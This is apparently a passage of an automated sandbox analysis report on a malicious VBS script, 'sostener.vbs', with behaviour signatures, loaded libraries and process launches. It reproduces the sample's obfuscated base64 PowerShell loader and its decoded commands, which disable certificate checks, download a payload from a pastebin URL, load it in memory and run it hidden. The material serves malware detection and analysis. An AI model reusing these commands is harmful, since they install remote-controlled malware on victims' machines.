                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: ___win________________________________________-------.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: sostener.vbsStatic file information: File size 16171698 > 1048576

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.zvY5BN2heK2TIOcNrbC0bNPZMGqnvAf,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9._0vBrtUZw7hUa1AOY5rvY7w8NmpLzHvD,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.bh72IhDw8xw2gMDfROdrEx3RkxspqBE,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.qQLtJVEG6Uovk3EgktqwU8y7gjto7WK,gNcBSL9UPrQHBDmUF.DfcW1H207ggSRdKZf()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EbvtVjzdwvbRTWudA[2],gNcBSL9UPrQHBDmUF.JMsdl19vGU2jGWaRz(Convert.FromBase64String(EbvtVjzdwvbRTWudA[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.zvY5BN2heK2TIOcNrbC0bNPZMGqnvAf,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9._0vBrtUZw7hUa1AOY5rvY7w8NmpLzHvD,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.bh72IhDw8xw2gMDfROdrEx3RkxspqBE,ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.qQLtJVEG6Uovk3EgktqwU8y7gjto7WK,gNcBSL9UPrQHBDmUF.DfcW1H207ggSRdKZf()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EbvtVjzdwvbRTWudA[2],gNcBSL9UPrQHBDmUF.JMsdl19vGU2jGWaRz(Convert.FromBase64String(EbvtVjzdwvbRTWudA[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, Class1.cs.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: ZsPuYsgyWtYvjRnlJ System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: Y9nt7JRhx6AOzIydJ System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: Y9nt7JRhx6AOzIydJ
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, Class1.cs.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, Class1.cs.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, Class1.cs.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: ZsPuYsgyWtYvjRnlJ System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: Y9nt7JRhx6AOzIydJ System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs.Net Code: Y9nt7JRhx6AOzIydJ
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, Class1.cs.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;$global:?
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] 